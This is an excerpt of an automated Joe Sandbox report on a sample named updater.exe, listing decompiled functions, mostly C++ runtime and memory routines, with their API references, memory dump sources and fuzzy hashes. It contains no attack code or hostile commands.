                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • std::_Facet_Register.LIBCPMT ref: 0140C891
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0140C8B1
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0140C8BE
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                  • String ID:
                                  • API String ID: 2081738530-0
                                  • Opcode ID: 4f084293fab9cc561f76dd32ec7c8d58206d4baeb0f7c3b35063992614ed4a24
                                  • Instruction ID: 64e161e45c383431de8716fdf0686f0045f32ba6940c46a3f2d61bd320e0d8b5
                                  • Opcode Fuzzy Hash: 4f084293fab9cc561f76dd32ec7c8d58206d4baeb0f7c3b35063992614ed4a24
                                  • Instruction Fuzzy Hash: F8010436D00116CFDB06AB6AC840ABEB761BFA0624F18415FD8006B3F0CF749E01DB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0140CB29
                                  • int.LIBCPMT ref: 0140CB40
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • std::_Facet_Register.LIBCPMT ref: 0140CB7A
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0140CB9A
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0140CBA7
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                  • String ID:
                                  • API String ID: 2081738530-0
                                  • Opcode ID: ce5850e187aa69e91d622b0746992990065b34cfa52a94fb0a98088cac25c715
                                  • Instruction ID: 0e7cbdc541c22a85b4ea4f95ad5781f55fbca20f95add20aad5be0fb2c138d19
                                  • Opcode Fuzzy Hash: ce5850e187aa69e91d622b0746992990065b34cfa52a94fb0a98088cac25c715
                                  • Instruction Fuzzy Hash: AB010075900216CBDB06AB69D840ABEBBB1BFA0724F18015ED804672F0CF749A01D781
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0140CBBE
                                  • int.LIBCPMT ref: 0140CBD5
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • std::_Facet_Register.LIBCPMT ref: 0140CC0F
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0140CC2F
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0140CC3C
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                  • String ID:
                                  • API String ID: 2081738530-0
                                  • Opcode ID: d83aff2ccbc379a37722a2911d3c44c7e662b4bdb6cbf0ccd100e64efdd1bc17
                                  • Instruction ID: ae7edfe028967fea5b12fe0c1481f1a8bf172d622e0abade5e55ff7546c93c59
                                  • Opcode Fuzzy Hash: d83aff2ccbc379a37722a2911d3c44c7e662b4bdb6cbf0ccd100e64efdd1bc17
                                  • Instruction Fuzzy Hash: 4E012235900216CBDB06EB69C850ABEBB70BFA0724F18465EE801673F0CF348E02C781
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0140CA94
                                  • int.LIBCPMT ref: 0140CAAB
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • std::_Facet_Register.LIBCPMT ref: 0140CAE5
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0140CB05
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0140CB12
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                  • String ID:
                                  • API String ID: 2081738530-0
                                  • Opcode ID: 73856317b02e701c784b79547d603da0bb27b635ecc1f6f55da0740e7ac8ca29
                                  • Instruction ID: a36ecffd07c17ca7f7acc49fca5caddedb769915338fce409c6027a9e4c10fdf
                                  • Opcode Fuzzy Hash: 73856317b02e701c784b79547d603da0bb27b635ecc1f6f55da0740e7ac8ca29
                                  • Instruction Fuzzy Hash: E5010036D00116CBCB06EB6A8844AAEBB70BFA0614F28415EE801672F0CF748E05DB82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 01406FE5
                                  • int.LIBCPMT ref: 01406FFC
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • std::_Facet_Register.LIBCPMT ref: 01407036
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 01407056
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 01407063
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                  • String ID:
                                  • API String ID: 2081738530-0
                                  • Opcode ID: 14fd68376fb662fe353480bee5e8ffdf713fc02cfb6bb4594a652dff0eae4d5a
                                  • Instruction ID: 47d6eb09f3862ccfc32e79ed890c5c21ff8ff3b274fbad7fd103d712cfe4c531
                                  • Opcode Fuzzy Hash: 14fd68376fb662fe353480bee5e8ffdf713fc02cfb6bb4594a652dff0eae4d5a
                                  • Instruction Fuzzy Hash: 5B012679D001168BDB06EB6AC840ABEB771BFA0719F18411ED811673F0CF34AE01CB82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0140707A
                                  • int.LIBCPMT ref: 01407091
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • std::_Facet_Register.LIBCPMT ref: 014070CB
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 014070EB
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 014070F8
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                  • String ID:
                                  • API String ID: 2081738530-0
                                  • Opcode ID: 451e2aa763aa79c1972856a85d7ba441d6b31e88073d8b90d01f9df3770b070d
                                  • Instruction ID: c4157dec4d9c7d35fd25c5800489e89bbbcb3c55aec2113a07f9dbd025c233a2
                                  • Opcode Fuzzy Hash: 451e2aa763aa79c1972856a85d7ba441d6b31e88073d8b90d01f9df3770b070d
                                  • Instruction Fuzzy Hash: 8101D279D002169BDB16EB69C804ABEBB70BFA4615F18811ED811677F0CF34AE05D782
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 01419552
                                  • int.LIBCPMT ref: 01419569
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • std::_Facet_Register.LIBCPMT ref: 014195A3
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 014195C3
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 014195D0
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                  • String ID:
                                  • API String ID: 2081738530-0
                                  • Opcode ID: 90788c4b71055de023fc96c8b062be6d9d92d77c5d165edfbb8c3025c5edd9d6
                                  • Instruction ID: ec5972060c7250168b6132240b9664d5c4c3cc7f454857d4b1c91f788aee0c3c
                                  • Opcode Fuzzy Hash: 90788c4b71055de023fc96c8b062be6d9d92d77c5d165edfbb8c3025c5edd9d6
                                  • Instruction Fuzzy Hash: F301C4369002168BCB05EB69C824AAEB7A5BFA0718F18404ED905672F5DF749A05C781
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 014195E7
                                  • int.LIBCPMT ref: 014195FE
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • std::_Facet_Register.LIBCPMT ref: 01419638
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 01419658
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 01419665
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                  • String ID:
                                  • API String ID: 2081738530-0
                                  • Opcode ID: 1a37ffe4a8fb97cdb4046619566704fb06d3747322d103502d05f879a9db0032
                                  • Instruction ID: c27dc797fc13b071c1bc27e05c62581bd012021e419da4f579ca42d0c6c81d66
                                  • Opcode Fuzzy Hash: 1a37ffe4a8fb97cdb4046619566704fb06d3747322d103502d05f879a9db0032
                                  • Instruction Fuzzy Hash: 3A0126359002169FDB05EB68C814ABEB774BFA0B18F18440ED808A73F5CF348E01C791
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 014197A6
                                  • int.LIBCPMT ref: 014197BD
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • std::_Facet_Register.LIBCPMT ref: 014197F7
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 01419817
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 01419824
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                  • String ID:
                                  • API String ID: 2081738530-0
                                  • Opcode ID: bffba5a7e0eef1080c3b0a5101e43394cb417cfed2490042ded5b8ac0f76e28f
                                  • Instruction ID: 0f0147b4e10fc723e90b5d1342bcfbbe850e24e5561fe5a0428f398dad015ae4
                                  • Opcode Fuzzy Hash: bffba5a7e0eef1080c3b0a5101e43394cb417cfed2490042ded5b8ac0f76e28f
                                  • Instruction Fuzzy Hash: 9201C035900116CFCB16EB69D824ABEBBB1BFA0B28F18411ED815672F5DF349E05C791
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • _free.LIBCMT ref: 014396E9
                                    • Part of subcall function 01430123: HeapFree.KERNEL32(00000000,00000000), ref: 01430139
                                    • Part of subcall function 01430123: GetLastError.KERNEL32(?,?,0142DA9C), ref: 0143014B
                                  • _free.LIBCMT ref: 014396FB
                                  • _free.LIBCMT ref: 0143970D
                                  • _free.LIBCMT ref: 0143971F
                                  • _free.LIBCMT ref: 01439731
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: faba9e9e867089c7c6633616270c6cc7fc3fe247953bfc68d6a6640373965b35
                                  • Instruction ID: 3adfa39a1ceccbd16d7ce96bee0fa8573fed00f8285a65d5d81fb9850364769c
                                  • Opcode Fuzzy Hash: faba9e9e867089c7c6633616270c6cc7fc3fe247953bfc68d6a6640373965b35
                                  • Instruction Fuzzy Hash: 19F04F72504200B7DA35DA6DE4C0C1B77DEEB98358764180AF258D7670C7B5FD80CA94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DeallocateH_prolog2
                                  • String ID: ", "$: "
                                  • API String ID: 1002199092-747220369
                                  • Opcode ID: f3cfdbdf451df3c531620562c061848f5bee16f259307060a5d7bc492110e67b
                                  • Instruction ID: ec2df5b2da4580c9dc83f9f0958878f458c828066b058239ae3b284ec3b88674
                                  • Opcode Fuzzy Hash: f3cfdbdf451df3c531620562c061848f5bee16f259307060a5d7bc492110e67b
                                  • Instruction Fuzzy Hash: B041F471A00205AFDF05DF68D884BAEBBB5FF54714F04016EE801AB291D774AD45CBE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • __EH_prolog3_GS.LIBCMT ref: 0141C2AA
                                    • Part of subcall function 01406F3F: std::_Lockit::_Lockit.LIBCPMT ref: 01406F50
                                    • Part of subcall function 01406F3F: int.LIBCPMT ref: 01406F67
                                    • Part of subcall function 01406F3F: std::_Lockit::~_Lockit.LIBCPMT ref: 01406FC1
                                  • _Find_elem.LIBCPMT ref: 0141C344
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Lockitstd::_$Find_elemH_prolog3_Lockit::_Lockit::~_
                                  • String ID: 0123456789-$0123456789-
                                  • API String ID: 2124549159-2494171821
                                  • Opcode ID: 7f1ba9481ad5884c40d8057604eb3d9630049414aa1311712b8d974feb7d484e
                                  • Instruction ID: c468d2e0795c3913b588f51f05490215e0ffa79071c70e601ba342bb6032470d
                                  • Opcode Fuzzy Hash: 7f1ba9481ad5884c40d8057604eb3d9630049414aa1311712b8d974feb7d484e
                                  • Instruction Fuzzy Hash: 3941AD32D0020DEFDF09DF98D980AEEBBB9FF14314F10005AE911A72A5DB759A46CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: +7$C:\Users\user\Desktop\updater.exe
                                  • API String ID: 0-1940217829
                                  • Opcode ID: a42d43814fa25c464115f0a19a1318ce890639357de0e850bb12483953c564dd
                                  • Instruction ID: 44da6c2b76cb52e89c137fb335c0d3cdef9efc1e82395cf2fc32f8a1369a5648
                                  • Opcode Fuzzy Hash: a42d43814fa25c464115f0a19a1318ce890639357de0e850bb12483953c564dd
                                  • Instruction Fuzzy Hash: 3F4164B1E00225AFDB259FDAD88099FBBF8EF99710B54006BE504D7370D7709A81C7A0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Mpunct$Getvals
                                  • String ID: $+xv
                                  • API String ID: 455491934-1686923651
                                  • Opcode ID: 5522329ac7d3dfacc1e3c7776a46a5a7eca137f5738b5feceda228f9a648aa1d
                                  • Instruction ID: af099e9a0b424d7492d66b1bdb637b6a9d443900076d83824cb9e6c7e040b388
                                  • Opcode Fuzzy Hash: 5522329ac7d3dfacc1e3c7776a46a5a7eca137f5738b5feceda228f9a648aa1d
                                  • Instruction Fuzzy Hash: D921B2B1904B526FD722DF768890B7BBEF8AB28200F14095FE499C7A90D774E651CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aullrem$__aulldiv__aulldvrm
                                  • String ID:
                                  • API String ID: 181600486-0
                                  • Opcode ID: 9c5e87da7cc41940317fd15cfea210bbc745300c47bd6eb69c7d484723a16a8e
                                  • Instruction ID: 759e8e8c4ba391897fa45c1958e8b3bf9e001fa14035f68a4de34cb3ac702f8e
                                  • Opcode Fuzzy Hash: 9c5e87da7cc41940317fd15cfea210bbc745300c47bd6eb69c7d484723a16a8e
                                  • Instruction Fuzzy Hash: 2ED18E306087918FD72ACE2C849866FBFE1BFCA208F184A5DF5C997291D774D946CB42
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _strrchr
                                  • String ID:
                                  • API String ID: 3213747228-0
                                  • Opcode ID: 4f983809a15a7a35b7c6d84a2bf04bc534233e66f7e3f93cdd22ea376eb66f83
                                  • Instruction ID: 010048fb4f0c81567d101f9e0d66739c22079b2e083cccc536b330e417aa1540
                                  • Opcode Fuzzy Hash: 4f983809a15a7a35b7c6d84a2bf04bc534233e66f7e3f93cdd22ea376eb66f83
                                  • Instruction Fuzzy Hash: 19B15B32A002469FDB15CF68C880FEFBBF5EF99350F14806BD955AB361D2B49942CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _strcspn$H_prolog3_ctype
                                  • String ID:
                                  • API String ID: 838279627-0
                                  • Opcode ID: 54f4e3a4878fa29898defe167c0631934a6ba58cd3d0342b83e3aa3f311e97d1
                                  • Instruction ID: cbbdcb17482da8050184888862db1638728a54550d7a32994985a679a5cf1703
                                  • Opcode Fuzzy Hash: 54f4e3a4878fa29898defe167c0631934a6ba58cd3d0342b83e3aa3f311e97d1
                                  • Instruction Fuzzy Hash: 26C17071D00249DFDF15DFD9C984AEEBBB9FF58310F14002AE905AB2A5D730AA45CB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _strcspn$H_prolog3_ctype
